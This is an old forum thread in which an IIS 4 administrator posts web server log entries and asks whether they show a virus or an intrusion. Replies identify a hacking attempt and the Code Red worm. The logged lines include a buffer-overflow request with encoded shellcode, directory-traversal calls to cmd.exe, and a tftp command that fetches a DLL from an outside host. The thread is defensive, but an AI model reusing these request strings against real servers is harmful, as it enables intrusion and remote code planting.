Virus or a hack??

Computing.Net > Forums > Security and Virus > Virus or a hack??

Computer Problems? Computing.Net has over 1,000,000 posts about all things technology related! Over 90% answered within 24 hours! Click here to start participating now! Also, be sure to check out the New User Guide.

Virus or a hack??

Name: Micheal
Date: August 11, 2002 at 22:42:36 Pacific

Comment:

Guys, I'm using Nt 4 server on iis 4
I'm ny web sites log i get this:
211.20.79.115, -, 8/12/02, 1:41:40, W3SVC3, ITSERVER2, %serversip%, 381, 4039, 604, 404, 2, GET, /default.ida, NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
and this:
213.191.82.127, -, 8/12/02, 2:00:06, W3SVC3, ITSERVER2, %servers ip%, 241, 65, 616, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
and this:
24.141.65.203, -, 8/10/02, 0:47:35, W3SVC3, ITSERVER2, %serversip% , 60, 153, 462, 502, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%2024.141.65.203%20GET%20cool.dll%20c:\httpodbc.dll,
That doesnt looks normal? doesnt it?
Is there a virus? or is someone trying to hack in?

Sponsored Link

Ads by Google

Response Number 1

Name: shadow
Date: August 12, 2002 at 02:19:14 Pacific

Reply:

looks like someone is trying to hack. the 2nd and 3rd look like they're trying to have some code executed, and the first one looks like it's trying to overrun a buffer
i could be wrong, but i doubt you have any websites trying to reference /winnt/system32/cmd.exe

Response Number 2

Name: Darthkim
Date: August 12, 2002 at 21:32:17 Pacific

Reply:

This is the code red vulnerability. read this to learn more.
http://www.cert.org/advisories/CA-2001-19.html

Sponsored Link

Ads by Google

novell hack novell hack Hack novell	ifconfig overruns python 1.41 shutdown hack
See More

msn trojan

pc anywhere passwords

Post Locked

This post is quite old and has been locked from receiving new replies. Please create a new posting instead.

Go to Security and Virus Forum Home

Sponsored links

Ads by Google

Results for: Virus or a hack??

A virus or a worm??

Summary

www.computing.net/answers/security/a-virus-or-a-worm/11620.html

Resurgence of old virus, or a new

Summary

www.computing.net/answers/security/resurgence-of-old-virus-or-a-new-/15918.html

Hacked or not hacked?

Summary

www.computing.net/answers/security/hacked-or-not-hacked/5697.html

From the Geek Dictionary
6502 - The first inexpensive and mass produced general processor. Was designed by...

Ask a Question!

Weekly Poll
Did you go shopping on Black Friday?

Poll Finishes In 4 Days.
Discuss in The Lounge
Poll History

Recent Posts
mac upgrades

Virus problem

Saving Thunderbird e-mails

DRIVER installation

laptop screen black.

All Awaiting Reply

Tom's News
Next Generation iPhone Spotted by Developers

Black Friday Brawls: Plenty Fought, No One Died

Couple Gets Married at Best Buy on Black Friday

Office 2010 Ships in 2010, Beta Now

Duke Nukem: D-Day Teased Not DNF

More Tom's Guide News

Data Recovery

Manufacturer List | About Us | Advertising Info | Contact Us
The information on Computing.Net is the opinions of its users. Such opinions may not be accurate and they are to be used at your own risk. Computing.Net cannot verify the validity of the statements made on this site. Computing.Net and Computing.Net LLC hereby disclaim all responsibility and liability for the content of Computing.Net and its accuracy.
PLEASE READ THE FULL DISCLAIMER AND LEGAL TERMS BY CLICKING HERE